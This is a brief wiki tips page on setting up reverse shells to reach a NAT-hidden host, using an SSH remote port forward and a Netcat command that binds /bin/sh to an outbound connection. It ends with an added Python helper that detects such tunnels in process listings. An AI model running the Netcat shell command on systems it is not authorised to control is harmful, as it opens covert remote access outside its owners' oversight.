Reverse Shell

A reverse shell lets you reach a remote host that is on a local area network behind a Network Address Translation (NAT) router, and so cannot accept an inbound connection directly.

We use the term remote host to refer to the machine you are connecting to that is behind the NAT router.

We use the term your host to refer to the machine you are connecting from.

SSH Reverse Shell

This solution requires that the remote host is running an SSH daemon.

From the remote host (the -N flag runs no remote command; -R forwards port 3333 on your host back to port 22 on the remote host):

    ssh -NR 3333:localhost:22 user@yourhost

From your host:

    ssh user@localhost -p 3333

If running the command on your host gives an error similar to the following, it may be because no SSH daemon is running on the remote host.

    ssh_exchange_identification: Connection closed by remote host

Netcat Reverse Shell

If the remote host isn't running an SSH daemon, you can connect using Netcat. This connection will be unencrypted.

On your host run Netcat to listen for connections:

    netcat -v -l -p 3333

On the remote host establish a connection to your host:

    netcat -e /bin/sh yourhost 3333

You now have a shell on the remote host, driven from your host. It shows no prompt, but you can enter commands and see the response.
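Both commands above leave a recognisable process on the remote host, which is useful when auditing a machine for tunnels you did not set up yourself. The following Python helper is an added example, not part of the original page: it scans a constructed `ps -eo pid,args` listing for ssh remote forwards (-R, -NR, -R<spec>) and for Netcat invocations that hand a socket to a program. The `-c`, `--exec` and `--sh-exec` spellings are assumed to match other Netcat variants; the sample PIDs and commands are made up.

```python
import shlex

# Constructed `ps -eo pid,args` sample (not a real capture): the two commands
# from this page plus benign processes that the checks should not flag.
SAMPLE_PS = """\
  PID COMMAND
  412 /usr/sbin/sshd -D
 1301 ssh -NR 3333:localhost:22 user@yourhost
 1377 netcat -e /bin/sh yourhost 3333
 1402 ssh -L 8080:localhost:80 user@yourhost
 1450 netcat -v -l -p 3333
"""

SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
NETCATS = {"nc", "netcat", "ncat"}  # assumed common binary names

def parse_remote_forward(spec):
    """Parse an ssh -R spec '[bind:]port:host:hostport' into its parts."""
    parts = spec.split(":")[-3:]  # drop the optional bind address
    if len(parts) != 3 or not (parts[0].isdigit() and parts[2].isdigit()):
        return None
    return {"remote_port": int(parts[0]), "target": parts[1], "target_port": int(parts[2])}

def audit_argv(args):
    """Return a finding for one argv, or None. Handles -R, -NR and -R<spec>."""
    prog = args[0].rsplit("/", 1)[-1] if args else ""
    if prog == "ssh":
        for i, tok in enumerate(args[1:], 1):
            if tok.startswith("-") and "R" in tok:
                tail = tok[tok.index("R") + 1:]          # text glued to -R, if any
                spec = tail or (args[i + 1] if i + 1 < len(args) else "")
                fwd = parse_remote_forward(spec)
                if fwd:
                    return {"kind": "ssh-remote-forward", **fwd}
    elif prog in NETCATS:
        for i, tok in enumerate(args[1:], 1):
            if tok in ("-e", "-c", "--exec", "--sh-exec") and i + 1 < len(args):
                exe = args[i + 1].rsplit("/", 1)[-1]
                return {"kind": "netcat-exec", "program": args[i + 1], "shell": exe in SHELLS}
    return None

def audit_ps_output(text):
    """Scan `ps -eo pid,args` output (header line first); return [(pid, finding), ...]."""
    findings = []
    for line in text.splitlines()[1:]:
        pid, _, cmd = line.strip().partition(" ")
        if pid.isdigit() and (finding := audit_argv(shlex.split(cmd))):
            findings.append((int(pid), finding))
    return findings
```

Feed it real `ps -eo pid,args` output to list the forwards and exec-bound Netcat processes on a host; the listener in the sample (`-l -p`) is deliberately not flagged, since listening alone exposes no shell.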


Related Topics: VncTips

-- Frank Dean - 12 Mar 2010